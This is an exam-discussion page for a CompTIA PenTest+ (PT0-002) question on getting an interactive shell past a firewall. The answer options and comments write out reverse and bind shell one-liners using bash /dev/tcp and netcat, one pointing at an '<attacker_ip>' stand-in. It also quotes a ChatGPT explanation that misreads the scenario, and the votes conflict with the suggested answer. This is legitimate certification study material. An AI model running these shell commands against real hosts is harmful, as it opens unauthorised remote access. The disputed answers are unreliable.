ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT0-002 All Questions

View all questions & answers for the PT0-002 exam
Go to Exam

Exam PT0-002 topic 1 question 416 discussion

Actual exam question from CompTIA's PT0-002
Question #: 416
Topic #: 1
[All PT0-002 Questions]

After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic. Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?

  • A. bash -i >& /dev/tcp 8443 0>&1
  • B. nc -e host 8443 /bin/bash
  • C. nc -vlp 8443 /bin/bash
  • D. nc -vp 8443 /bin/bash
Show Suggested Answer Hide Answer
Suggested Answer: C 🗳️
by zemijan at Dec. 21, 2024, 1:20 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
Snagggggin
2 months, 3 weeks ago
Selected Answer: C
It's C. The outbound connection attempt from A would be blocked.
upvoted 2 times
...
GS1981
3 months, 1 week ago
Selected Answer: C
The firewall is blocking outbound traffic from the remote host, so I would think you need to set up a bind shell which means a listener (l), so nc -vlp 8443 -e /bin/bash for me is the answer. However the -e is left off the answer (maybe that's a typo)
upvoted 3 times
...
Alex818119
3 months, 1 week ago
Selected Answer: A
Chat GPT: explanation: The key part of the question is that outbound traffic is blocked by a firewall. To overcome this, the penetration tester needs to execute a reverse shell from the compromised host that initiates an outbound connection to the attacker's machine. The command must also ensure compatibility with typical Unix-based systems. Option A: bash -i >& /dev/tcp/<attacker_ip>/8443 0>&1 This command creates a reverse shell using Bash. Here is how it works: bash -i: Starts an interactive Bash shell.>& /dev/tcp/<attacker_ip>/8443: Redirects input and output streams to a TCP socket connected to the attacker's IP on port 8443.0>&1: Links standard input to the output, enabling two-way communication.Since it originates the connection from the compromised host to the attacker's system, it bypasses firewalls blocking inbound traffic.
upvoted 2 times
kinny4000
2 months, 2 weeks ago
"Outbound" traffic means traffic from the target to the attacker. This means a reverse shell would be blocked. If it said inbound then you would be correct
upvoted 2 times
...
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago